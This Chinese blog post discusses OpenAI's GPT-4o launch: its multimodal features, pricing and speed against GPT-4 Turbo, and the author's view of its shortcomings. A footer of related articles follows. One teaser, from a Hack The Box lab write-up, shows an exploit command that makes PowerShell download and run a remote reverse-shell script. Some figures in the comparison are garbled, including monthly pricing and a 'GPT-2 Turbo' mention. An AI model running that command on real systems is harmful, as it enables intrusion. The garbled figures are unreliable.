你好GPT-4o——对GPT-4o发布的思考与看法

你好GPT-4o

前言

在这里插入图片描述

2024年5月13日,OpenAI官网发布了他们的新一代自然语言处理交互系统——GPT-4o。这是OpenAI继GPT4之后又一个新的旗舰模型。

GPT-4o(“o”代表“omni”)是迈向更自然的人机交互的一步——它接受文本、音频、图像和视频的任意组合作为输入,并生成文本、音频和图像输出的任意组合。它可以在短短 232 毫秒内响应音频输入,平均为 320 毫秒,这类似于人工响应时间(在新窗口中打开)在对话中。它在英语文本和代码上的能力同 GPT-4 Turbo 性能相匹配,在非英语语言的文本上也有显着改进,同时在 API 中也更快且便宜 50%。与现有模型相比,GPT-4o 在视觉和音频理解方面尤其出色。

不能否认的一点是,它与GPT-4的差距并没有像GPT-3.5和GPT-4那样之大,你可以将它看成GPT-4的Ultra版本或者是Pro版本。但基于GPT-4强大的语言处理能力和内容输出的高质量,并在此基础上进行了一次再进化,它变得更快、更强、甚至是免费面向用户的——我认为这是它最大的特点之一。

在这里插入图片描述

免费带来的结果:这使更多用户能够更好地体验GPT的功能,并且是使用最新的旗舰版;可能会造成对人工智能的过度的依赖——我们并不知道这是好是坏;带动其他AI公司的内卷上升——这有利于用户,也有利于市场竞争——这是一个好的现象,这说明人工智能服务正在朝着大众的方向前进,也使其变得更加平常化和低成本化,从而能推动诸多事物的发展。

那么这次的人工智能的更新,从技术层面,又为我们带来怎样的惊喜呢?

技术层面的Update

1.音频、视觉和文本

我们阅读官方的文档可以发现,这次的GPT-4o版本反复强调其在音频、视觉和文本上的重要提升。而在我们使用之后也不得不承认这是事实。

OpenAI GPT-4o guessing May 13th’s announcement on Vimeo
上述这段视频是来自OpenAI官网,展示了GPT-4o在视觉和音频理解方面出色的能力。

在这里插入图片描述
在这里插入图片描述

而这主要体现在以下几个点:

  • 更深层次的理解:GPT-4o在处理复杂句子结构和抽象概念方面表现得更加出色,能够更准确地理解上下文并生成连贯的回应。
  • 更丰富的词汇量:它具有更广泛的词汇库,能够更好地处理多种语言和不同领域的专业术语。
  • 更丝滑的回答和应对能力:针对提问者发出的问题,它能够更加人性化地给出答案,并且在给出答案地基础上展现更多符合语境和对话方的语气词以及态度。

同时,有以下几个有趣的点:我们随时说话随时打断GPT,并且它能够理解我们的语气和态度;响应速度极快,无需等待尴尬的2—3秒;可以模仿不同风格的语气——dramatic、robotic、terrible;可以识别符号——人类创作的具有象征意义的符号…诸如此类,还有很多我们意想不到的特征值得我们去探索。

2. 知识库扩展

  • 更新的知识基础:GPT-4o基于更新的数据进行训练,因此能够提供更为最新的知识和信息。相较于前代具有更广阔的知识库和更新的数据。
  • 更强的推理能力:在回答需要逻辑推理和复杂推断的问题时表现更好,能够给出更合理和有依据的答案。

3. 多模态处理能力的进一步加强

这个特点是基于音视频、文本处理综合而成的。它能够带来综合性的能力展现,给用户更好的融合性能体验。

  • 图像理解:GPT-4o处理和生成与图像相关的文本,进行图像描述、分析和生成相应的文字解释的能力进一步加强,更加准确。
  • 跨模态融合:具备在文本与其他形式数据(如图像、声音等)之间进行更有效的融合和转换的能力。

4. 对话管理和互动

  • 上下文保持:GPT-4在长对话中保持上下文一致性的能力更强,能够更好地理解和记住之前的对话内容。
  • 情感和语气控制:能够根据用户的情感和对话语境调整回应的语气,更加自然和人性化。

5. 编程与技术问答

  • 代码生成和理解:在编程帮助和技术问题解答方面,GPT-4o表现得更为出色,能够生成更高质量的代码并解释复杂的技术概念。
  • 多语言支持:支持更多的编程语言,并能够处理复杂的编程任务和跨语言的技术问题。
  • 用户体验上升:用户在编写代码的过程中对于GPT的使用更加顺滑和便捷。

6. 创造性任务

  • 创意写作:在写作小说、剧本、诗歌等创造性任务方面,GPT-4o展现了更强的创造力和连贯性。
  • 内容生成:能够生成更有创意和原创性的内容,满足用户多样化的内容需求。

7. 用户体验

  • 响应速度:处理和生成文本的速度更快,提升了用户的整体体验。
  • 提供了更好的UI:通过更直观和用户友好的界面,增强用户的互动体验。
  • API的开放

8.人工智能之间的互相对话

这次官网的展示视频中,有一个视频很有趣,那就是两个GPT-4o之间的对话。

在这里插入图片描述

第一个点:互动

第二个点:唱歌

这倒也是实现了机机交互。

GPT-4 Turbo 与 GPT-4o

GPT-4o 具有相同的高智商,但比 GPT-4 Turbo 更快、更便宜,并且具有更高的速率限制。具体说来:

  • 定价:GPT-4o 比 GPT-4 Turbo 便宜 50%,输入 5 美元/月,输出代币 15 美元/M)。
  • 速率限制:GPT-4o 的速率限制是 GPT-4 Turbo 的 5 倍——每分钟最多 1000 万个代币。
  • 速度:GPT-4o 的速度是 GPT-2 Turbo 的 4 倍。
  • 视觉:GPT-4o 的视觉能力在与视觉能力相关的评估中表现优于 GPT-4 Turbo。
  • 多语言:GPT-4o 改进了对非英语语言的支持,而不是 GPT-4 Turbo。

GPT-4o 目前的上下文窗口为 128k,知识截止日期为 2023 年 10 月。

思考与找出其不足

在这里插入图片描述

当我们聊完了它的优点之后,特别是对比它的前辈GPT-4之后,我们不得不想去找出它的缺点、或者是不足来证明它为啥免费提供、为啥在套餐中的限用额度还是比GPT-4高——也就是说相较于4它更便宜。

首先从模型的名字上来看,GPT-4和4o仅仅只差了一个字母o,而3和4却是直接差了一代。为什么不将其直接命名为5呢?可以猜测,OpenAI这次发布的新产品,实际上也是在为他们的下一代旗舰模型——GPT-5做准备,这次的4o只是预热,就如当年GPT-3.5的免费紧随着GPT-4的发布。很有可能在接下来的一年(保守)之内,OpenAI将会释放出他们的全新模型,并且是一次新的提升,在某个我们难以预料又或许常用的方面具有巨大的提升,所以我们拭目以待。

在这里插入图片描述

另外,其实相较于GPT-4o,4的训练模型已经足够成熟,并且能够胜任大部分工作,所以它依旧是作为工作辅助的首选。从人们的接受度来看也会选择更加老练的版本,这样更为靠谱,那么公司为了盈利,当然就会将他们更熟练的模型定价更高,从而获得更多利润,这是从公司盈利的角度。

那么从这次的更新上来看,确实也有些不足的地方:

例如在与其对话的过程中,打断说话时的处理方式较为生硬,我们可能还是需要按下暂停键才能打断GPT,我认为真正的语言交互或许是无差别对话:也就是不需要任何按键或者提示,你可以随时开启对话,随时打断对话,随时结束对话,甚至加上情境,何时结束对话较为合适,我们应该说些什么让气氛不那么尴尬等等。

奥特曼回应称,OpenAI会继续改进并提升语音功能的质量:“我相信,语音交互是通向未来交互方式的一个重要线索。如果能够实现真正优质的语音互动体验,将会是一种与计算机互动的全新方式。”“我相信,语音交互是通向未来交互方式的一个重要线索。如果能够实现真正优质的语音互动体验,将会是一种与计算机互动的全新方式。”

另外其他例如语音生成的速度依旧不够快、语气处理有待加强、在较为复杂的问题上还是会有疏漏等等,实际上这些也算是老问题了——但这也算挑刺,毕竟这次的更新还是有着极大的飞跃的。

你好GPT,未来会怎样?

在这里插入图片描述

当我不带任何提示词问GPT时,给出的答案是有条有理——条条框框的。
而当我使用语音对话(基于3.5的模型)问它这个问题时,我发现与这次发布的4o确实有较大差距。无论是从回答上还是从语音的处理上。

或许人工智能的发展总是充满奇迹和想象力,而当我们沉溺于技术的发展时,总不能忘记我们时刻要保持清醒,理性看待——尽管这是这两年来老生常谈的问题,但我们依旧不可忽视。

未来会是如何?无人知晓,让我们期待GPT-5、6、7的到来,并且对此再去享受、去适应、去思考。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/25147.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

单源最短路径算法 -- 迪杰斯科拉(Dijkstra)算法

1. 简介 迪杰斯科拉(Dijkstra)算法是一种用于在加权图中找到最短路径的经典算法。它是由荷兰计算机科学家Edsger Wybe Dijkstra在1956年首次提出的,并以他的名字命名。这个算法特别适合于解决单源最短路径问题,即计算图中一个顶点…

保姆级讲解 Redis的理论与实践

文章目录 Redis学习笔记一 、Redis简介1.1 什么是Redis1.2 NoSQL1.3 NoSQL的类别1.4 总结:1.5 Redis 描述1.6 Redis的特点1.7 Redis的应用场景1.8 Redis总结 二、Redis安装2.1 Redis官网2.2 Redis 安装2.3 安装gcc2.4 安装Redis2.5 安装到指定的位置 三 、Redis启动…

深入理解C语言:main函数的奥秘

在C语言中,main函数是每个程序的入口点,起着至关重要的作用。本文将深入探讨main函数的工作原理,包括其参数、返回值、以及如何从main启动程序的执行。通过实际代码示例,读者将更深入地理解main函数在C语言编程中的核心地位。 第一…

安装 JDK 17

安装包 百度网盘 提取码:6666 安装步骤 双击下载得到的安装包,开始安装: 正在安装: 安装完成: 安装路径下,多出来了很多新的内容。安装文件夹所包含的内容及作用: src 是 JDK 的源码包。类库…

【vue实战项目】通用管理系统:图表功能

目录 前言 1.概述 2.数据概览页 2.1.柱状图 2.2.折线图 2.3.地图 前言 本文是博主前端Vue实战系列中的一篇文章,本系列将会带大家一起从0开始一步步完整的做完一个小项目,让你找到Vue实战的技巧和感觉。 专栏地址: https://blog.csd…

Golang | Leetcode Golang题解之第134题加油站

题目&#xff1a; 题解&#xff1a; func canCompleteCircuit(gas []int, cost []int) int {for i, n : 0, len(gas); i < n; {sumOfGas, sumOfCost, cnt : 0, 0, 0for cnt < n {j : (i cnt) % nsumOfGas gas[j]sumOfCost cost[j]if sumOfCost > sumOfGas {break}…

openai 前员工释放出关于AGI的前世今生和未来发展趋势的详细报告

目录 1.引言2.AGI的临近3.投资与工业动员4.国家安全与AI竞赛5.技术挑战与机遇6.项目与政策7.结语8.原文PDF链接PS.扩展阅读ps1.六自由度机器人相关文章资源ps2.四轴机器相关文章资源ps3.移动小车相关文章资源 1.引言 2024年&#xff0c;我们站在了一个全新的科技前沿。在这篇文…

如何做好电子内窥镜的网络安全管理?

电子内窥镜作为一种常用的医疗器械&#xff0c;其网络安全管理对于保护患者隐私和医疗数据的安全至关重要。以下是一些基本原则和步骤&#xff0c;用于确保电子内窥镜的网络安全&#xff1a; 1. 数据加密 为了防止数据泄露&#xff0c;电子内窥镜在传输患者图像数据时应采取有…

Docker的资源限制

文章目录 一、什么是资源限制1、Docker的资源限制2、内核支持Linux功能3、OOM异常4、调整/设置进程OOM评分和优先级4.1、/proc/PID/oom_score_adj4.2、/proc/PID/oom_adj4.3、/proc/PID/oom_score 二、容器的内存限制1、实现原理2、命令格式及指令参数2.1、命令格式2.2、指令参…

htb-window-4-Optimum-HttpFileServer 2.3

nmap exploit-HttpFileServer 2.3 生成ps1反弹shell 模拟漏洞案例的请求 python 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString(http://10.10.16.5/reverse.ps1)"获取flag s…

selenium-java自动化教程

文章目录 Selenium支持语言WebDriver 开始使用chromedriver模拟用户浏览访问模拟点击事件关闭弹窗&#xff0c;选中元素并点击 获取页面文本结语 Selenium Selenium是一个自动化测试工具&#xff0c;可以模拟用户操作web端浏览器的行为&#xff0c;包括点击、输入、选择等。也可…

Linux---进程/磁盘管理

文章目录 目录 文章目录 一.Linux中进程的概念 二.显示系统执行的进程 2.1: ps 命令 2.2 top 命令 三.终止进程 四.磁盘分区 一.Linux中进程的概念 在Linux中&#xff0c;进程是指操作系统中正在执行的程序的实例。每个进程都由操作系统分配了独立的内存空间&#xff0c;用于…

[数据集][目标检测]足球场足球运动员身份识别足球裁判员数据集VOC+YOLO格式312张4类别

数据集格式&#xff1a;Pascal VOC格式YOLO格式(不包含分割路径的txt文件&#xff0c;仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)&#xff1a;312 标注数量(xml文件个数)&#xff1a;312 标注数量(txt文件个数)&#xff1a;312 标注类别…

调查显示各公司在 IT 安全培训方面存在差距

网络安全提供商 Hornetsecurity 最近进行的一项调查显示&#xff0c;许多组织的 IT 安全培训存在严重缺陷。 这项调查是在伦敦举行的 Infosecurity Europe 2024 期间发布的&#xff0c;调查发现 26% 的组织没有为其最终用户提供任何 IT 安全培训。 这些调查结果来自世界各地的…

阿里云活动推荐:AI 应用 DevOps 新体验

活动简介 阿里云新活动&#xff0c;体验阿里云的云效应用交付平台。体验了下&#xff0c;总体感觉还不错。平台把常规的开发过程封装成了模板&#xff0c;部署发布基本都是一键式操作&#xff0c;并且对自定义支持的比较好。 如果考虑将发布和部署搬到云上&#xff0c;可以玩一…

Directory Opus 13.6 可用的apk文件右键菜单脚本

// apk文件的右键经过adb安装的脚本,可以在多个设备中选择function OnClick(clickData) {try {// 检查是否选中了文件if (clickData.func.sourcetab.selected_files.count 0) {DOpus.Output("没有选中任何文件");return;}// 获取选中的文件名var selectedFile clic…

JSTL知识点讲解与配置

JSTL&#xff08;JavaServer Pages Standard Tag Library&#xff09;是Java EE平台中的一个标准库&#xff0c;提供了一组用于在JSP&#xff08;JavaServer Pages&#xff09;中简化和标准化常见任务的标签。这些标签封装了很多常见的JSP功能&#xff0c;可以使得JSP页面更加简…

天工开物 #14 分析时序数据:从 InfluxQL 到 SQL 的演变

近年来&#xff0c;时序数据的增长是 Data Infra 领域一个不容忽视的趋势。这主要得益于万物互联带来的自然时序数据增长&#xff0c;以及软件应用上云和自身复杂化后的可观测性需求。前者可以认为是对联网设备的可观测性&#xff0c;而可观测性主要就建构在设备或应用不断上报…

【C#】WinForm关闭新(二级)界面使主程序关闭

参考视频&#xff1a;https://www.bilibili.com/video/BV1JY4y1G7jo?p14&vd_source1c57ab1b2e551da5b65c0dfb0f05a493 1.背景介绍 主程序界面&#xff0c;点击弹出二级界面&#xff08;同时隐藏主界面&#xff09;&#xff0c;不做任何设置&#xff0c;这时关闭二级界面…

Java基础_Stream流

Java基础_Stream流 Stream流的简单使用Stream流的获取Stream流的中间方法Stream流的终结方法综合练习数字过滤字符串过滤并收集自定义对象过滤并收集 来源Gitee地址 Stream流的简单使用 public class StreamDemo01 {public static void main(String[] args) {/*** 创建集合添加…